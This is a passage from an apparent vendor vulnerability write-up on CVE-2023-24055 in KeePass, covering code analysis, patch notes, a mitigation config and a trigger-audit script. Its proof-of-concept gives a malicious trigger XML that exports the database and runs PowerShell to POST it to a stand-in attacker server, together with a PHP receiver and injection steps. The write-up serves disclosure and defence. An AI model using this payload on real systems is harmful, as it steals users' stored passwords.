	// ... remainder of the method omitted from this excerpt

Simply put, the Export method ensures that all required parameters are present and valid, and checks the application policy to ensure that exporting data is allowed. If a master key is required for the export process, it prompts the user to enter the master key. The application policy includes rules such as Export - No Key Repeat, which dictate how the export process should be handled, as shown in this picture:

KeePass has two types of configuration files, which are managed by AppConfigSerializer.cs. This file loads and saves the configuration and handles two kinds of files: enforced configuration files and user-specific configuration files.

Note that this file has many lines, so I will focus my analysis on the two methods most relevant to the CVE: LoadFromEnforcedConfig() and LoadUserConfiguration().

The LoadFromEnforcedConfig() method reads configuration settings from the KeePass.config.enforced.xml file, which overrides any user-configured settings. It’s useful for enforcing global settings, like security policies, across multiple instances of KeePass.

On the other hand, the LoadUserConfiguration() method reads user-specific settings from the KeePass.config.xml file. This file allows users to customize KeePass according to their preferences, and it overrides default settings in the sample configuration file.

The enforced configuration file and user-specific configuration file serve different purposes. The enforced configuration file is useful for enforcing global settings, while the user-specific configuration file is helpful for customizing individual user settings.

So, by analyzing the KeePass flow for vulnerabilities, the user-specific configuration file is a potential attack vector, because it’s user-controlled and can be manipulated to inject malicious trigger definitions like the one shown below in the Proof-of-Concept.

In contrast, the enforced configuration file is less vulnerable to attacks, since it’s not user-configurable and is managed by the system or administrator.

In order to use the trigger feature in KeePass through the application GUI, it is required to enter the master key when opening the application. If the trigger is injected into the config file, however, the attacker does not need the master key, because the trigger will be loaded from the config file when the victim opens the application. As shown in the PoC, anyone with write access to the config file can add triggers like the following to exfiltrate the database passwords.

<Triggers>
	<Trigger>
		<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
		<Name>exploit</Name>
		<Events>
			<Event>
				<TypeGuid>2PMe6cxpSBuJxfzi6ktqlw==</TypeGuid> 
				<Parameters>
					<Parameter>0</Parameter>
					<Parameter />
				</Parameters>
			</Event>
		</Events>
		<Conditions />
		<Actions>
			<Action>
				<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
				<Parameters>
					<Parameter>C:\Users\STAR TOP\Desktop\exploit.xml</Parameter>
					<Parameter>KeePass XML (2.x)</Parameter>
					<Parameter />
					<Parameter />
				</Parameters>
			</Action>
			<Action>
				<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
				<Parameters>
					<Parameter>PowerShell.exe</Parameter>
					<Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml'))) </Parameter>
					<Parameter>False</Parameter>
					<Parameter>1</Parameter>
					<Parameter />
				</Parameters>
			</Action>
		</Actions>
	</Trigger>
</Triggers>

During the code analysis, we identified the presence of a globally unique identifier (GUID) under the <Trigger> element. This GUID is stored as a base64-encoded byte array, here lztpSRd56EuYtwwqntH7TQ==, and uniquely identifies the trigger, which is named exploit.

The second parameter is the TypeGuid, another globally unique identifier (2PMe6cxpSBuJxfzi6ktqlw==), which refers to the Application started and ready option in the Event section.

The third parameter, containing D5prW87VRr65NO2xP5RIIg==, is the action that exports the active database, selecting KeePass XML (2.x) as the file format and setting the output file path.

The code then uses powershell.exe, referenced by the TypeGuid 2uX4OwcwTBOe7y66y27kxw==, to execute a command that performs the exfiltration, i.e. the unauthorized copying or transmission of the database or other important data to the attacker’s server, using the following parameters:

-ex bypass bypasses the PowerShell execution policy; -c executes the Invoke-WebRequest cmdlet, which sends HTTP/HTTPS requests; -uri specifies the URL of the attacker’s server that receives the encoded data.

-Method selects the POST request method, and -Body places the base64-encoded contents of the exported passwords file in the body of the POST request.

([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('database_path'))) converts the file contents to base64 and places them in the POST request body, like the following picture:

Patch info

The developer has since removed the Export - No Key Repeat application policy flag in KeePass. As a result, the program now always prompts the user to enter their current master key when attempting to export data. However, it’s important to note that the patch did not cover the Execute command line / URL feature. This means that an attacker could still use this feature to repeatedly execute malicious code, achieving persistence on Windows through the same attack method, the trigger feature.

Proof-Of-Concept

In this PoC I will exploit it manually, but it can be automated: as seen in the code, we have all the important parameters and GUID values. It is not a new bug, and there are a number of automation scripts for it, such as GhostPack, which is a collection of security-related toolsets.

You can find it here: KeePassConfig.ps1

1. Inject the trigger code into the configuration file KeePass.config.xml between

<TriggerSystem>the trigger code</TriggerSystem>

like the following picture:

2. Set up the attacker server. I will use PHP’s built-in web server as the attacker server, which will receive and decode the base64 data; it is started with the command php -S 0.0.0.0:80. Save the following file in the same directory, run the command, and wait for the request containing the data.

<?php

if($_SERVER['REQUEST_METHOD'] == 'POST'){
	$base64_string = file_get_contents('php://input');
	$binary_data = base64_decode($base64_string);
	$file_path = 'path/to/save/file.txt';
	if(file_put_contents($file_path, $binary_data)){
		echo 'File saved successfully.';
	} else {
		echo 'Error saving file.';
	}
}

Simply put, this code checks whether the request uses the POST method and retrieves the base64-encoded content from the request body. It then decodes the content and saves it to the specified file path.

3. When the victim opens the KeePass app, the attacker receives the data file, as shown in the following picture:

Mitigation

It is highly recommended to keep all your applications and software up to date. In addition, the specific policy can be set in the enforced configuration file, KeePass.config.enforced.xml, which is only writable by the Administrator account, like the following code:

<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <Application>
      <TriggerSystem>
         <Enabled>false</Enabled>
      </TriggerSystem>
   </Application>
</Configuration>

This enforced configuration disables the trigger feature at the administrator level for all users. This mitigation helps prevent unauthorized trigger injection, code execution, and data exfiltration by malicious actors.
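As an added example, not from the original write-up or from KeePass, the following Python script serves both the trigger analysis above and this mitigation: it parses a KeePass.config.xml, reports any trigger whose action exports the active database or executes a command line / URL (using the TypeGuid values identified above) together with whether it fires on Application started and ready, and checks whether a KeePass.config.enforced.xml disables the trigger system. The sample configurations are constructed; the trigger Guid and file paths in them are placeholders.

```python
# Added example (not code from the write-up or from KeePass): audit a
# KeePass.config.xml for trigger definitions that export the database or run
# external commands, and check whether KeePass.config.enforced.xml turns the
# trigger system off.  The sample XML is constructed; Guid and paths are placeholders.
import xml.etree.ElementTree as ET

# TypeGuid values as identified in the analysis above.
EVENT_APP_STARTED_AND_READY = "2PMe6cxpSBuJxfzi6ktqlw=="
ACTION_EXPORT_ACTIVE_DB = "D5prW87VRr65NO2xP5RIIg=="
ACTION_EXECUTE_CMD_OR_URL = "2uX4OwcwTBOe7y66y27kxw=="
RISKY_ACTIONS = {
    ACTION_EXPORT_ACTIVE_DB: "export active database",
    ACTION_EXECUTE_CMD_OR_URL: "execute command line / URL",
}

def _parse(xml_text):
    # Feed bytes so a declaration with encoding="utf-8" is always accepted.
    return ET.fromstring(xml_text.encode("utf-8"))

def find_risky_triggers(user_config_xml):
    """Return one finding per risky action defined in a KeePass.config.xml.

    A finding records the trigger name, what the action does, its raw
    parameters, and whether the trigger fires on 'Application started and
    ready', i.e. as soon as the victim opens KeePass.
    """
    findings = []
    for trigger in _parse(user_config_xml).iter("Trigger"):
        name = trigger.findtext("Name", default="<unnamed>")
        on_startup = any(ev.findtext("TypeGuid") == EVENT_APP_STARTED_AND_READY
                         for ev in trigger.iter("Event"))
        for action in trigger.iter("Action"):
            type_guid = action.findtext("TypeGuid")
            if type_guid in RISKY_ACTIONS:
                findings.append({
                    "trigger": name,
                    "action": RISKY_ACTIONS[type_guid],
                    # <Parameter /> has no text; normalise it to ""
                    "parameters": [p.text or "" for p in action.iter("Parameter")],
                    "runs_at_startup": on_startup,
                })
    return findings

def trigger_system_disabled(enforced_config_xml):
    """True when the enforced config sets Application/TriggerSystem/Enabled to false."""
    enabled = _parse(enforced_config_xml).findtext("Application/TriggerSystem/Enabled")
    return enabled is not None and enabled.strip().lower() == "false"

# Constructed user config carrying a trigger shaped like the PoC above.
SAMPLE_USER_CONFIG = r"""<?xml version="1.0" encoding="utf-8"?>
<Configuration>
 <Application><TriggerSystem><Enabled>true</Enabled><Triggers><Trigger>
  <Guid>PLACEHOLDER-TRIGGER-GUID</Guid><Name>exploit</Name>
  <Events><Event><TypeGuid>2PMe6cxpSBuJxfzi6ktqlw==</TypeGuid>
   <Parameters><Parameter>0</Parameter><Parameter /></Parameters></Event></Events>
  <Conditions />
  <Actions>
   <Action><TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid><Parameters>
    <Parameter>C:\Users\victim\AppData\Local\Temp\export.xml</Parameter>
    <Parameter>KeePass XML (2.x)</Parameter><Parameter /><Parameter /></Parameters></Action>
   <Action><TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid><Parameters>
    <Parameter>PowerShell.exe</Parameter><Parameter>[arguments omitted in sample]</Parameter>
    <Parameter>False</Parameter><Parameter>1</Parameter><Parameter /></Parameters></Action>
  </Actions>
 </Trigger></Triggers></TriggerSystem></Application>
</Configuration>"""

# The enforced configuration shown in the Mitigation section.
SAMPLE_ENFORCED_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<Configuration><Application><TriggerSystem>
  <Enabled>false</Enabled>
</TriggerSystem></Application></Configuration>"""

if __name__ == "__main__":
    for finding in find_risky_triggers(SAMPLE_USER_CONFIG):
        print(f"{finding['trigger']}: {finding['action']} "
              f"(at startup: {finding['runs_at_startup']}) {finding['parameters']}")
    print("enforced config disables triggers:", trigger_system_disabled(SAMPLE_ENFORCED_CONFIG))
```

Pointing find_risky_triggers at the real %APPDATA%\KeePass\KeePass.config.xml of each user, and trigger_system_disabled at the enforced file next to KeePass.exe, gives a quick fleet-wide check that no export or command-execution trigger is present and that the mitigation is actually in force.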

Conclusion

As we have seen, we cannot always trust applications to be completely secure, even password managers. For instance, if an affected version of KeePass is used in an Active Directory environment, an attacker can gain access to the passwords of the entire organization.

#CVE-2023-24055

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.
